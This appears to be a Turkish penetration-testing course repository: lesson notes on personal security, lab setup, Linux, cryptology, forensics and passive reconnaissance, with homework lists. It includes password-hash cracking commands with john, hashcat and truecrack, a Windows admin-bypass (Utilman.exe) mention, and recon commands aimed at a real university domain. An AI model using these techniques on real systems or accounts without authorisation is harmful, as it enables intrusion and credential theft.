dikkat edilmelidir. 39 | - Örneğin [whatsapp][16] gibi şifresiz iletişim yapan uygulamalar yerine [telegram][17] gibi çözümler tercih edilmelidir. 40 | 41 | ## Sunucu Güvenliği 42 | 43 | - Kişisel sunucuların güvenliği de büyük önem arz etmektedir. 44 | - Buna göre örneğin VPN olarak kullandığınız veya kişisel blog sitelerinin tutulduğu sunuculara ayrıca önem verilmelidir. 45 | - Böyle sunucuların saldırganlar tarafından ele geçirilmesi ileride gelecek olan büyük saldırılara hazırlık olarak kullanılabilir. 46 | 47 | ## Paylaşımlı Ağ Güvenliği 48 | 49 | - Paylaşımlı ağlar kişisel güvenlik için en büyük tehditlerin başında gelmektedir. 50 | - Buna göre örneğin gidilen bir kafe'de bağlanılan ağ içerisinde bir saldırgan tarafından saldırıya uğrama olasılığı çok yüksektir. 51 | - Bu yüzden çok gerekmediği sürece bu tarz ağlara giriş yapılmaması gerekmektedir. 52 | - Eğer zorunlu ise ortadaki adam saldırıları için önlem alınması ve VPN kullanılarak internete çıkılması gerekmektedir. 53 | - Tabi tüm bunlar %100 derecede önlem sağlamamaktadır. 54 | 55 | ## Kişisel Ağ Güvenliği 56 | 57 | - Ev içerisinde internete bağlanma amaçlı kullanılan modemlerin güvenliği de kişisel güvenlik açısından önemlidir. 58 | - Kablosuz ağlarda WPS pinlerinin aktifliği, MAC filtrelemesi gibi güvenlik önlemlerinin ayrıca incelenmesi ve sadece gerektiği takdirde aktif olmaları gerekmektedir. 59 | - Ayrıca modemler içerisinde kullanılan yazılımlar için [OpenWRT][19] gibi çözümlerin kullanılması da daha doğru olacaktır. 60 | - Aynı şekilde ağ içerisinde [Pfsense][20] kullanılması da tercih edilebilir. 61 | 62 | ## Örnekler 63 | 64 | - Windows işletim sistemine sahip, full disk encryption olmayan, admin parolası bilinmeyen bir sisteme live cd kullanarak erişim. (Utilman.exe yöntemi) 65 | - En çok kullanılan 4 kablosuz ağın güvenliklerine göre analizi. 66 | 67 | ## Ödev 68 | 69 | - BIOS ve GPU kaynaklı zararlı yazılımların araştırılması ve önlemlerin alınması. 70 | - Full disk encryption ile birlikte [Blackarch][4] işletim sisteminin kurulması. 71 | - Örnek olarak gösterilen saldırının başka formatlarda benzer şekilde uygulanması. 72 | - [Zanti][14] uygulamasının kurulması ve incelenmesi. 73 | - [Nethunter][15] uygulamasının kurulması ve incelenmesi. 74 | - [Telegram][17] uygulamasının kurulması ve secret chat özelliğinin incelenmesi. 75 | - Vlan hopping kavramının araştırılması. 76 | - Sanallaştırma çözümlerinin getirdiği avantajları kavrama. 77 | - DNS Crypt kullanılması, getirdiği önlemleri detaylıca inceleme. 78 | - Sanal makine içerisine [Pfsense][20] kurulması ve test edilmesi. 79 | 80 | [1]: https://wikileaks.org/hackingteam/emails/ 81 | [2]: https://bgr.com/2015/07/31/windows-10-upgrade-spying-how-to-opt-out/ 82 | [3]: https://www.kali.org/ 83 | [4]: http://blackarch.org/ 84 | [5]: https://www.archlinux.org/ 85 | [6]: https://www.gentoo.org/ 86 | [7]: https://en.wikipedia.org/wiki/Linux_Unified_Key_Setup 87 | [8]: http://truecrypt.sourceforge.net/ 88 | [9]: https://en.wikipedia.org/wiki/Pretty_Good_Privacy 89 | [10]: https://play.google.com/store/apps/details?id=org.thoughtcrime.redphone&hl=tr 90 | [11]: https://play.google.com/store/apps/details?id=com.fsck.k9&hl=tr 91 | [12]: https://play.google.com/store/apps/details?id=mobi.wifi.toolbox&hl=tr 92 | [13]: https://secupwn.github.io/Android-IMSI-Catcher-Detector/ 93 | [14]: https://www.zimperium.com/zanti-mobile-penetration-testing 94 | [15]: https://www.kali.org/kali-linux-nethunter/ 95 | [16]: https://www.whatsapp.com/?l=tr 96 | [17]: https://telegram.org/ 97 | [18]: 04-gizlilik.md 98 | [19]: https://openwrt.org/ 99 | [20]: https://www.pfsense.org/ 100 | -------------------------------------------------------------------------------- /00-temeller/06-lab.md: -------------------------------------------------------------------------------- 1 | # Lab 2 | 3 | ## Sanallaştırma 4 | 5 | - Herhangi bir sanallaştırma çözümü kullanılabilir. Ancak eğitim içerisinde [virtualbox][1] yazılımı kullanılacaktır. 6 | 7 | ## Network 8 | 9 | - Sanal makineler için **PentestNetwork** ve **MalwrNetwork** isimli iki adet nat networku oluşturulacaktır. İlgili networkler içerisinde 10.0.3.0/24 ve 10.0.4.0/24 ip blokları kullanılabilir. 10 | 11 | ## Sanal Makineler 12 | 13 | - **pentest**: Debian 64 bit, 20gb disk, 1gb ram, [Kali Linux][2] dağıtımı, PentestNetwork ağı. Ayrıca [bakınız][8] 14 | - **pentestlab-network**: Debian 64 bit, 8gb disk, 512mb ram, [Metasploitable][3] dağıtımı, PentestNetwork ağı. 15 | - **pentestlab-web**: Debian 64 bit, 8gb disk, 512mb ram, [Web for pentester][4] dağıtımı, PentestNetwork ağı. 16 | - **pentestlab-win**: Windows xp 32 bit, 20gb disk, 256mb ram, [Windows XP SP3][5] işletim sistemi, PentestNetwork ağı. 17 | - **malwarelab-32**: Windows xp 32 bit, 20gb disk, 256mb ram, [Windows XP SP3][5] işletim sistemi, MalwrNetwork ağı. 18 | - **malwarelab-64**: Windows 7 64 bit, 20gb disk, 512mb ram, [Windows 7 Professional SP1][6] işletim sistemi. MalwrNetwork ağı. 19 | 20 | ## Ayarlamalar 21 | 22 | - **pentest**: Kali Linux işletim sisteminin kurulması gerekmektedir. Bunun için [default][7] ayarlar kullanılabilir. Kurulum yapıldıktan sonra snapshot alınması gerekmektedir. 23 | - **pentestlab-network**: Metasploitable dağıtımının kurulması gerekmektedir. İlk kurulumdan sonra snapshot alınması yeterlidir. 24 | - **pentestlab-web**: Herhangi bir ayarlama gerektirmemektedir. ISO ile birlikte live olarak kullanılabilir. 25 | - **pentestlab-win**: Kurulum yapıldıktan sonra firewall özelliğinin devredışı bırakılması gerekmektedir. 26 | - **malwarelab-32**: Kurulumdan sonra çeşitli araçların kurulması gerekmektedir. Bu araçlar konusu geldiğinde paylaşılacaktır. 27 | - **malwarelab-64**: Kurulumdan sonra çeşitli araçların kurulması gerekmektedir. Bu araçlar konusu geldiğinde paylaşılacaktır. 28 | 29 | [1]: https://www.virtualbox.org/wiki/Downloads 30 | [2]: https://www.kali.org 31 | [3]: http://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 32 | [4]: https://pentesterlab.com/exercises/web_for_pentester 33 | [5]: https://e5.onthehub.com/WebStore/Welcome.aspx?ws=d0ada7dc-6b9b-e011-969d-0030487d8897&vsro=8 34 | [6]: https://e5.onthehub.com/WebStore/Welcome.aspx?ws=d0ada7dc-6b9b-e011-969d-0030487d8897&vsro=8 35 | [7]: http://docs.kali.org/category/installation 36 | [8]: odevler/kali-linux-kurulumu.md 37 | -------------------------------------------------------------------------------- /00-temeller/07-linux.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | ## Kabuk 4 | 5 | - Kullanıcının işletim sistemiyle iletişimini sağlayan yorumlayıcıdır. 6 | - Verilen komutları işletim sistemine, komutların çıktılarını da kullanıcıya iletir. 7 | - Birçok uygulaması vardır. Bash, sh, zsh en çok bilinenleridir. 8 | 9 | ## Komutlar 10 | 11 | - **pwd**: bulunulan dizini ekrana basar. 12 | ``` 13 | pwd 14 | ``` 15 | 16 | - **man**: komut hakkında detaylı bilgi almak için kullanılır. 17 | ``` 18 | man pwd 19 | man grep 20 | ``` 21 | 22 | - **mkdir**: yeni bir dizin oluşturmak için kullanılır. 23 | ``` 24 | mkdir deneme_dizin 25 | mkdir -p deneme_dizin_diger/alt_dizin 26 | mkdir -p deneme_dizin_deger/{0..9} 27 | ``` 28 | 29 | - **touch**: yeni bir dosya oluşturur. 30 | ``` 31 | touch deneme_dosya_diger 32 | touch deneme_dizin_x/{A..Z} 33 | ``` 34 | 35 | - **rm**: dosya veya klasör siler. 36 | ``` 37 | rm deneme_dosya 38 | rm -r deneme_dizin/ 39 | rm -rf deneme_dizin/ 40 | ``` 41 | 42 | - **cp**: dosya veya klasör kopyalama için kullanılır. 43 | ``` 44 | cp deneme_dosya deneme_dosya3 45 | cp deneme_dizin deneme_dizin2 -r 46 | ``` 47 | 48 | - **mv**: dosya veya klasörleri taşımak için kullanılır. 49 | ``` 50 | mv deneme_dosya deneme_dosya3 51 | ``` 52 | 53 | - **find**: gelişmiş arama aracıdır. 54 | ``` 55 | find . -name "*.txt" 56 | ``` 57 | 58 | - **cd**: dizin değiştirmek için kullanılır. 59 | ``` 60 | cd .. 61 | cd 62 | cd deneme/ 63 | ``` 64 | 65 | - **ls**: dosya ve dizinleri listeleyip, özelliklerini görüntüler. 66 | ``` 67 | ls -a 68 | ls -l 69 | ls -r 70 | ``` 71 | 72 | - **cat**: dosya içeriğini görüntüler. 73 | ``` 74 | cat deneme_dosya 75 | ``` 76 | 77 | - **echo**: ifadeleri ekrana basar. 78 | ``` 79 | echo "deneme" 80 | echo $HOME 81 | ``` 82 | 83 | - **more**, **less**: içeriği fazla olan, ekrana sığmayan dosyaları görüntüler. 84 | ``` 85 | more deneme_dosya 86 | less deneme_dosya 87 | ``` 88 | 89 | - **head**: bir dosyanın baştan itibaren istenilen sayıda satırını ekrana basar. 90 | ``` 91 | head deneme_dosya 92 | head -1 deneme_dosya 93 | ``` 94 | 95 | - **tail**: head gibi çalışır ancak sondan itibaren ekrana basar. 96 | ``` 97 | tail deneme_dosya 98 | tail -1 deneme_dosya 99 | tail -f deneme_dosya 100 | ``` 101 | 102 | - **grep**: metin dosyaları içerisinde belirli değerleri aramak için kullanılır. 103 | ``` 104 | grep "kelime" deneme_dosya 105 | grep "kelime" . -R 106 | grep "Kelime" deneme_dosya -i 107 | ``` 108 | 109 | - **uname**: sistem bilgilerini görüntüler. 110 | ``` 111 | uname 112 | uname -a 113 | ``` 114 | 115 | - **chown**: dosya veya klasörlerin sahibi ve grubunu değiştirir. 116 | ``` 117 | chown halit:users deneme_dosya 118 | chown -R halit:users deneme_dizin/ 119 | ``` 120 | 121 | - **service**: servislerin yönetilmesi için kullanılır. 122 | ``` 123 | service apache2 start 124 | service apache2 status 125 | ``` 126 | 127 | - **mount**: diskleri sisteme bağlar. 128 | ``` 129 | mount 130 | mount /dev/sdb1 mnt 131 | ``` 132 | 133 | ## Çıktı Yönlendirme 134 | 135 | - Komutların çıktıları dosyalara yönlendirilebileceği gibi, dosya içerikleri de komutlara yönlendirilebilir. 136 | - Doğrudan bir çıktı **>** işareti ile yönlendirilir. Yönlendirildiği yerdeki diğer içeriği siler. 137 | - Aynı işlem **>>** işareti ile yapılsaydı, içeriğin sonuna ekleme yapılacaktı. 138 | - Komutlara girdi vermek için **<** işareti kullanılır. 139 | - Bir komutun çıktısını diğer komuta vermek için **|** kullanılır. 140 | 141 | ``` 142 | echo "deneme2" > deneme_dosya 143 | echo "deneme3" >> deneme_dosya 144 | cut -d ":" -f1 < /etc/passwd 145 | cat /etc/passwd | cut -d ":" -f1 146 | cat /etc/passwd | cut -d ":" -f1 | grep root 147 | ``` 148 | 149 | ## Dosya Sistemi 150 | 151 | - **/bin**: Kullanıcı ve sistem yöneticisine ait çalıştırılabilir dosyaları barındırır. 152 | - **/dev**: Donanımlara erişebilmek için gerekli dosyaları barındırır. 153 | - **/etc**: Sistem konfigürasyonları için gerekli dosyaları barındırır. 154 | - **/lib**: Sistem kütüphanelerini barındırır. 155 | - **/sbin**: Sistem yöneticisine ait çalıştırılabilir dosyaları barındırır. 156 | - **/home**: Kullanıcılara ait dizindir. 157 | - **/mnt**: Sisteme dışarıdan bağlanacak olan donanım aygıtlarının, bağlantı 158 | noktalarını belirten dizindir. 159 | - **/root**: Bir sistemde en yetkili kullanıcı olan "root" kullanıcısına ait dizindir. 160 | - **/tmp**: Geçici dosyaların yer aldığı dizindir. 161 | - **/usr**: Paylaşılan dosyaların barındığı dizindir. Burada çalışabilen dosyalar 162 | bulunmakla beraber, döküman ve programlara ait dosyalar da yer almaktadır. 163 | - **/var**: Sistem ve programlara ait log mesajları, email gibi mesajların bulunduğu 164 | dizindir. 165 | - **/proc**: Sistem hakkında gerekli bilgilerin bulunduğu sanal dizindir. 166 | - **/boot**: Linux Kernelini barındıran, sistem haritalarını ve ikinci seviye boot 167 | yükeleyicilerini barındıran dizin. 168 | - **/opt**: Add-on yazılımların bulunduğu alandır. 169 | 170 | ## Dosya İzinleri 171 | 172 | - Her dosya ve klasörün hem sahibi hem de grubu vardır. 173 | - Bu izinler read(4), write(2), execute(1) olmaktadır. 174 | - İzinler verilirken sahip, gurup ve herkes olarak belirlenir. 175 | 176 | ``` 177 | chmod 777 deneme_dosya 178 | chmod +x deneme_uygulama 179 | chmod g+wx deneme_uygulama 180 | ``` 181 | 182 | ## Network Ayarları 183 | 184 | - **ifconfig**: mevcut ağ arayüzlerinin yönetimi için kullanılır. 185 | - **dhclient**: DHCP'den ip talebinde bulunur. 186 | 187 | ``` 188 | ifconfig 189 | ifconfig eth0 190 | ifconfig eth0 192.168.2.2 netmask 255.255.255.0 191 | dhclient eth0 192 | ``` 193 | 194 | ## Kullanıcı Yönetimi 195 | 196 | - **/etc/passwd**: Kullanıcı bilgileri tutulur. 197 | - **/etc/shadow**: Kullanıcıların şifre özetleri tutulur. 198 | 199 | ``` 200 | useradd osman 201 | cat /etc/passwd 202 | userdel osman 203 | ``` 204 | 205 | ## Süreç Yönetimi 206 | 207 | - Çalışmakta olan her program süreç olarak adlandırılır. 208 | - Her sürecin kendine has bir PID numarası vardır. 209 | 210 | ``` 211 | ps 212 | ps -aux 213 | top 214 | jobs -l 215 | fg 216 | bg 217 | ./uygulama & 218 | kill -9 1139 219 | ``` 220 | 221 | ## Paket Yönetimi 222 | 223 | ``` 224 | apt-get install paket 225 | apt-cache search paket 226 | apt-get update 227 | apt-get upgrade 228 | apt-get remove paket 229 | ``` 230 | 231 | ## Kaynak Koddan Kurulum 232 | 233 | ``` 234 | ./configure 235 | make 236 | make install 237 | ``` 238 | 239 | ## Sistem Bilgisi 240 | 241 | ``` 242 | lsblk 243 | df -h 244 | cat /proc/cpuinfo 245 | cat /proc/meminfo 246 | netstat 247 | netstat -antl 248 | ``` 249 | 250 | ## Ödev 251 | 252 | - **Bash** script nedir ve nasıl nasıl yazılır? 253 | - Basit düzeyde **bash script** örnekleri yazıp, inceleyiniz. (dosya okuma, for, while, if) 254 | - **touch** ile oluşturulma tarihi farklı dosya oluşturunuz. 255 | - **SUID** bit kavramını araştınız. 256 | - **SUID** biti set edilmiş dosyaları bulan komutu yazınız. 257 | - Tüm sistem içerisindeki en büyük 10 dosyayı bulan komutu yazınız. 258 | - **/proc/** dizini altında yer alan dosyaların ve klasörleri inceleyiniz. 259 | - Firefox ile izlenen bir youtube videosunu **/proc/** dizini altından çıkarınız. 260 | - **fdisk** ve **cfdisk** araçlarının kullanımlarını öğreniniz. USB diskler üzerinde deneme yapınız. 261 | - **gparted** aracını kurup, inceleyiniz. 262 | - **zsh** kabuğunu kurunuz ve **oh-my-zsh** eklentisi ile birlikte kullanınız. 263 | - **top** ve **htop** araçlarını kullanınız. 264 | - Yazılan bir scripti başlangıçta çalışacak şekilde ayarlayınız. 265 | - Yazılan bir scripti 10 dakikada bir çalışacak şekilde ayarlayınız. 266 | - Çalıştırılan bir uygulama içerisinde ortaya çıkan hata mesajlarını **/dev/null** dosyasına yönlendiriniz. 267 | - **./program1 &** ile **./program1 && ./program2** komutu arasındaki farkı kavrayınız. 268 | - **dpkg** ile **apt-get** uygulamaları arasındaki farkı araştırınız. 269 | - Ubuntu için paket yöneticisi **apt-get** ise, **archlinux**, **redhat**, **fedora**, **centos** ve **gentoo** için ne olduğu araştırınız. 270 | - **Bootloader** nedir? Kullandığınız işletim sisteminin bootloaderi nedir? 271 | - **tr**, **wc**, **sort**, **uniq**, **awk** ve **sed** araçlarının kullanımını öğreniniz. 272 | - **wget** ve **curl** kullanımını araştırınız. 273 | - Bir dosyanın yanlışlıkla silinmesini önlemek için ne yapılabilir? 274 | - **Arch Linux** veya **Gentoo** dağıtımlarından birisini kendinize seçip kurulumunu yapınız. 275 | -------------------------------------------------------------------------------- /00-temeller/08-kriptoloji.md: -------------------------------------------------------------------------------- 1 | # Kriptoloji 2 | 3 | ## Tanımlar 4 | 5 | - **Kriptoloji:** Şifre bilimidir. Kriptografi ve kriptoanaliz birleşiminden oluşur. 6 | - **Steganografi:** Veriyi saklama veya gizleme bilimidir. 7 | - **Encoding:** Verinin başka bir forma dönüştürülmesidir. 8 | 9 | ## Encoding 10 | 11 | - Çoğu zaman veriyi farklı formlara dönüştürmek gerekmektedir. 12 | - Örneğin elimizdeki binary bir resmi, ascii karakterlerden oluşan bir diziye dönüştürme düşünülebilir. 13 | - Burada dikkat edilmesi gereken nokta, şifreleme yapılmadığıdır. 14 | - Sadece aynı veri farklı bir forma dönüştürülmektedir. 15 | - Orjinal haline herkes geri dönüştürebilir. 16 | - En ünlü encode yöntemlerinden birisi base64'tür. 17 | 18 | ``` 19 | echo -n "deneme" | base64 20 | echo -n "ZGVuZW1l" | base64 -d 21 | cat resim.jpg | base64 > resim.encoded 22 | ``` 23 | 24 | ## Hash 25 | 26 | - Hash fonksiyonları genellikle tek gidişli fonksiyonlar olarak tanımlanmaktadır. 27 | - Giriş kısmından verilen veriyi her zaman aynı boyuttaki unique bir değere dönüştürmektedir. 28 | - Verilen veri 10K, 1M, 100M, 1GB de olsa çıkıştaki uzunluk hep aynı olmaktadır. 29 | - Fonksiyonların gücü, güvenilirliği genellikle çakışma oranı ile ölçülmektedir. 30 | - Eğer girişten verilen iki farklı veri aynı özet çıktısına giderse ilgili hash fonksiyonu zayıftır denilebilir. 31 | - En çok kullanılan hash algoritmalarına örnek md5, sha1, sha256, sha512, LM, NTLM verilebilir. 32 | 33 | ``` 34 | echo -n "123456" | md5sum 35 | echo -n "123456" | sha1sum 36 | echo -n "123456" | sha256sum 37 | md5sum dosya.jpg 38 | ``` 39 | 40 | ## Hash Kırma Saldırıları 41 | 42 | - Yapılan büyük yanlışlardan birisi de şifrelerin hash halini almanın, bir şifreleme yöntemi olduğunu düşünmektir. 43 | - Tek yönlü bir fonksiyon olduğu için geriye dönüş teorik olarak imkansızdır. (en azından imkansız olması beklenmektedir) 44 | - Bu yüzden hash algoritmalarına kriptografik saldırılar yerine wordlist veya kaba kuvvet saldırıları yapılmaktadır. 45 | - **John The Ripper** aracının hash formatlarına [buradan][0] bakabilirsiniz. 46 | - Hash kırma saldırılarının vazgeçilmesi olan [hashcat][1] aracı GPU gücünden de faydalanabilmektedir. 47 | - Saldırılar arasında en hızlı sonuç getiren şüphesiz rainbow table denilen yöntemdir. Bu sayede yerden kaybedilmesine rağmen hızdan kazanılmaktadır. 48 | - Popüler algoritmalar için tablolara [buradan][2] ulaşabilirsiniz. 49 | 50 | ``` 51 | echo "halit:e10adc3949ba59abbe56e057f20f883e" > a.txt 52 | john a.txt --format=Raw-MD5 53 | echo "diger:b24ed7db06817c48245a939dd97e72573a81c881" > b.txt 54 | john b.txt --wordlist /usr/share/wordlists/rockyou.txt --format=Raw-SHA1 55 | echo "e10adc3949ba59abbe56e057f20f883e" > c.txt 56 | hashcat -m 0 -a 0 c.txt /usr/share/wordlists/rockyou.txt 57 | ``` 58 | 59 | ## Simetrik Şifreleme 60 | 61 | - Veriler bloklar halinde işleme alınır. 62 | - Haliyle blok boyutları sabittir ve isimlendirmelerde belirtilir. 63 | - Verinin boyu yetersiz ise gereksiz veriler ilgili boyuta tamamlandır. 64 | - Kullanılan şifreleme modu çok önemlidir. Doğru mod seçimi yapılmazsa saldırılara maruz kalınabilir. 65 | - İlgili modların kullanımı ve sonuçlarına [buradan][3] ulaşabilirsiniz. 66 | - En ünlüleri AES, DES, Blowfish, Serpent ve Twofish'tir. Ancak AES standart olarak kabul edilmektedir. 67 | 68 | ``` 69 | echo "deneme metin" > d.txt 70 | gpg -c --cipher-algo AES256 d.txt 71 | gpg -o original.txt -d d.txt.gpg 72 | ``` 73 | 74 | ## Simetrik Şifre Saldırıları 75 | 76 | - Kullanılan mod kaynaklı saldırı yöntemleri değişebilmektedir. 77 | - Örneğin ECB modundaki bir şifreleme de, anahtara sahip olunamasa da istenilen sonuca erişilebilir. 78 | - 2DES'de olduğu gibi kullanım kaynaklı da saldırılar yapılabilmektedir. [Meet in the Middle][4] saldırısı buna örnektir. 79 | 80 | ``` 81 | truecrack -t deneme_dosya --wordlist /usr/share/wordlists/rockyou.txt 82 | ``` 83 | 84 | ## Asimetrik Şifreleme 85 | 86 | - Simetrik şifrelemede güvenlik algoritmanın gizliliğine değil, anahtarın korunmasına bağlıdır. Haliyle tek anahtar olmaktadır. 87 | - Ancak birden fazla kişiyle aynı verinin güvenli paylaşımı için herkese anahtarın paylaştırılması gerekmektedir. 88 | - Anahtar paylaşım problemini ortadan kaldırmak için asimetrik şifreleme önerilmiştir. 89 | - Buna göre artık tek bir anahtar yerine, public ve private anahtar ikilileri oluşturulmaktadır. 90 | - Karşı tarafa gönderilmek istenen veri, ilgili kişinin public anahtarı ile şifrelenerek gönderilir. 91 | - Veriyi alan kişi de kendi private anahtarı ile eski haline dönüştürür. 92 | - Burada public anahtarın paylaşılması güvenlik olarak herhangi bir risk teşkil etmemektedir. 93 | - Sistemin güvenliği private anahtarın korunmasına bağlıdır. 94 | - Asimetrik şifreleme sadece verileri şifrelemek için kullanılmamaktadır. 95 | - Imzalama sistemlerinde de asimetrik şifrelemeden faydalanılmaktadır. 96 | - En popüler algoritma RSA'dir. 97 | 98 | ## OTP 99 | 100 | - Doğru kullanımlarda en güvenli algoritma olarak nitelendirilmektedir. 101 | - Ancak aynı anahtarın tekrar tekrar kullanılması ile crib-drag saldırı tekniği ile kolay bir şekilde kırılabilmektedir. 102 | 103 | ## Dizi Şifreleme 104 | 105 | - Yüksek hız gerektiren yerlerde tercih edilirler. 106 | - Örneğin A5 algoritması GSM protokolünde verinin şifrelenmesi için kullanılır. 107 | - Aynı şekilde WEP protokolü de RC4 şifreleme algoritmasını kullanmaktadır. 108 | - Uygulanmasından kaynaklı olarak saldırılara maruz kalmaktadır. 109 | - RC4 algoritmasına karşı gerçekleştirilebilen çok kolay ve güçlü yöntemler bulunmaktadır. 110 | 111 | ## Steganografi 112 | 113 | - Şifrelemede amaç verinin başka bir forma dönüştürülmesiyken, steganografi de amaç verinin başka bir veri içerisinde saklanmasıdır. 114 | - Herhangi bir veri, herhangi başka bir veri içerisine saklanabilmektedir. 115 | - En çok kullanılan tekniklerin başında LSB bulunmaktadır. 116 | 117 | ``` 118 | echo "gizli veri" > e.txt 119 | steghide embed -cf a.jpg -ef e.txt 120 | steghide extract -sf a.jpg 121 | ``` 122 | 123 | ## Örnekler 124 | 125 | - Truecrypt ile AES bloğu oluşturma ve truecrack ile kırılması. 126 | - Browser üzerinde sertifika incelenmesi. 127 | - Cryptolocker virüsünün incelenmesi. 128 | 129 | ## Ödev 130 | 131 | - **HMAC** tekniğine karşı yapılan **length extension** saldırısını araştırınız. **hashpump** aracının kullanımını inceleyiniz. 132 | - **MD5** algoritmasına karşı yapılabilecek saldırıları analiz ediniz. İki adet aynı hash değerine sahip farklı çıktı üreten dosya oluşturunuz. 133 | - Doğumgünü paradoxunu inceleyiniz. Hash algoritmaları için önemini kavrayınız. 134 | - **WEP** algoritmasına yönelik saldırıların nasıl gerçekleştiğini öğrenininiz. Altında yatan kriptografik zayıflığı kavrayınız. 135 | - Amazon tarzı bulut sistemlerde şifre kırma saldırılarının nasıl gerçekleştirildiğini araştırınız. 136 | - **ophcrack** ve **rainbowcrack** araçlarının ne tarz bir saldırı yaptığını araştırınız. 137 | - **ECB** moduna yönelik yapılan saldırıları inceleyiniz. 138 | - **zip2john** ve **rar2john** kullanarak **zip** ve **rar** dosyalarını kırınız. Aynı yöntemi **pdf** için de gerçekleştiriniz. 139 | - **crunch** aracı ile nasıl wordlist oluşturulduğunu araştırınız. 140 | - **crib-drag** yönteminin ne olduğunu kavrayınız. Bu işi yapan örnek bir araç bulunuz. 141 | - **SSL** ve **TLS** arasındaki farkları inceleyiniz. 142 | - **A5** şifreleme yöntemine yönelik saldırıların neden **PlayStation** üzerinde başarılı olduğunu kavrayınız. 143 | - **gpa** benzeri bir araç ile public-private anahtar yönetimi yapınız. 144 | - **AES** ve **RSA** için güvenli en düşük bit miktarlarını araştırınız. 145 | - Asal çarpanlarına ayırma algoritmalarının iyileşmesinin **RSA** algoritmasına zararını araştırınız. 146 | - **outguess** aracının kullanımını araştırınız. 147 | - **steghide** kullanılması sırasında kullanılan şifrenin kırılması için bir araç geliştiriniz. 148 | - **Enigmail** eklentisinin **Thunderbird** uygulamasına kurulması ve public-private key oluşturulması. Aynı zamanda karşılıklı şifreli iletişim sağlanması. 149 | 150 | [0]: http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats 151 | [1]: https://hashcat.net/oclhashcat/ 152 | [2]: http://project-rainbowcrack.com/table.htm 153 | [3]: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation 154 | [4]: https://en.wikipedia.org/wiki/Meet-in-the-middle_attack 155 | -------------------------------------------------------------------------------- /00-temeller/09-forensic.md: -------------------------------------------------------------------------------- 1 | # Forensic 2 | 3 | ## Dosya Türü 4 | 5 | - Her binary dosyanın başında türünü belirten magic number bulunmaktadır. 6 | - Bu özel sayı her zaman gerçek formatını belirtmemektedir. 7 | - Çeşitli uygulamaları aldatmak için kullanılabilir. 8 | 9 | ``` 10 | file a.jpg 11 | file a.zip 12 | file a.txt 13 | hexeditor a.jpg 14 | hexdump -C a.jpg | head 15 | ``` 16 | 17 | ## Sıkıştırma Araçları 18 | 19 | - Verinin sıkıştırılması ile tamamen farklı bir forma dönüş yapılmaktadır. 20 | - Bu yüzden sıkıştırma yöntemlerinin ve araçlarının da iyi bilinmesi gerekmektedir. 21 | 22 | ``` 23 | zip a.zip a.txt 24 | tar cvf a.tar a.txt 25 | tar czvf a.tar.gz a.txt 26 | gzip a.txt 27 | gzip -d a.txt.gz 28 | ``` 29 | 30 | ## Bilgi Toplama 31 | 32 | - Elimizdeki binary dosyanın türünü belirledikten sonra üzerinde bilgi toplama aşaması başlar. 33 | - Bu noktada dosya türüne göre farklı araçlar kullanılmaktadır. 34 | 35 | ``` 36 | readelf -h 37 | strings uygulama 38 | exiftool resim.jpg 39 | binwalk uygulama_diger 40 | dd if=uygulama_diger of=ilginc.jpg skip=8 count=20 41 | volatility -f zeus.vmem imageinfo 42 | volatility -f zeus.vmem pstree 43 | volatility -f zeus.vmem filescan 44 | ``` 45 | 46 | ## Network 47 | 48 | - Network forensic aşamasında en iyi yardımcı şüphesiz ki Wireshark aracıdır. 49 | - Desteklediği protokol sayısından, kullanım kolaylığına kadar pek de rakibi yoktur. 50 | 51 | ## Örnekler 52 | 53 | - [evidence01.pcap][0] dosyasından, Ann'in konuştuğu kişinin adını ve gönderdiği dosyanın adını bulma. 54 | 55 | ## Örnek Kod 56 | 57 | ``` 58 | #include 59 | 60 | const char* secret = "cok gizli"; 61 | const int super_secret[] = {0x73,0x75,0x70,0x65,0x72,0x20,0x67,0x69,0x7a,0x6c,0x69}; 62 | 63 | int main(){ 64 | printf("Hello World\n"); 65 | } 66 | ``` 67 | 68 | ``` 69 | ",".join(map(lambda x: hex(ord(x)), "super gizli")) 70 | ``` 71 | 72 | ## Ödevler 73 | 74 | - UPX kullanarak çalıştırılabilir bir dosyayı sıkıştırınız. 75 | - Forensic yarışmasındaki geri [kalan][2] soruları çözmeye çalışınız. 76 | - **volatility** aracını kullanarak diğer bellek [örneklerini][1] analiz ediniz. 77 | - **foremost** kullanarak silinmiş dosyaların nasıl geri döndürüldüğünü inceleyiniz. 78 | - Metadata silen araçları araştırınız. 79 | - Büyük pcap dosyalarının **Wireshark** ile nasıl açılacağını araştırınız. 80 | - Windows işletim sistemi içerisinde bellek dumpı alınız ve bu dumpı analiz ediniz. 81 | - MFT'nin ne olduğunu araştırınız. 82 | - Honeynet'in hazırladığı [soruları][3] çözmeye çalışınız. 83 | - Kendi network trafiğinizi **tcpdump** aracı ile kaydediniz. **Wireshark** ile analiz ediniz. 84 | 85 | [0]: http://forensicscontest.com/contest01/evidence01.pcap 86 | [1]: https://code.google.com/p/volatility/wiki/FAQ#Are_there_any_public_memory_samples_available_that_I_can_use_for 87 | [2]: http://forensicscontest.com/puzzles 88 | [3]: https://honeynet.org/challenges 89 | -------------------------------------------------------------------------------- /00-temeller/0A-pasif-bilgi-toplama.md: -------------------------------------------------------------------------------- 1 | # Pasif Bilgi Toplama 2 | 3 | ## Online Siteler 4 | 5 | - google.com 6 | - archive.org 7 | - shodan.io 8 | - pipl.com 9 | - yougetsignal.com 10 | - bing.com 11 | 12 | ## Araçlar 13 | 14 | ``` 15 | whois ktu.edu.tr 16 | fierce -dns ktu.edu.tr 17 | theharvester -d ktu.edu.tr -l 500 -b google 18 | dig mx ktu.edu.tr 19 | dig a www.ktu.edu.tr 20 | traceroute google.com 21 | ``` 22 | 23 | ## Ödev 24 | 25 | - **Pastebin** sitesini detaylıca inceleyiniz. Pasif bilgi toplama için kullanıp kullanılamayacağını araştırınız. 26 | - **Github** üzerinden nasıl pasif bilgi toplanabileceğini araştırınız. 27 | - Sosyal medya siteleri üzerinden pasif bilgi toplama yöntemlerini araştırınız. 28 | - Mail gönderen kişinin ip adresinin nasıl bulunacağını öğreniniz. 29 | - Zone transfer açıklığını araştırınız. 30 | - **Maltego** aracını kullanmayı öğreniniz. 31 | - **Google hacking db** kavramını araştırınız, denemeler yapınız. 32 | - **Fierce** aracına wordlist vererek tarama gerçekleştiriniz. 33 | -------------------------------------------------------------------------------- /00-temeller/README.md: -------------------------------------------------------------------------------- 1 | # Temeller 2 | 3 | Konu | Açıklama 4 | ---- | ----------- 5 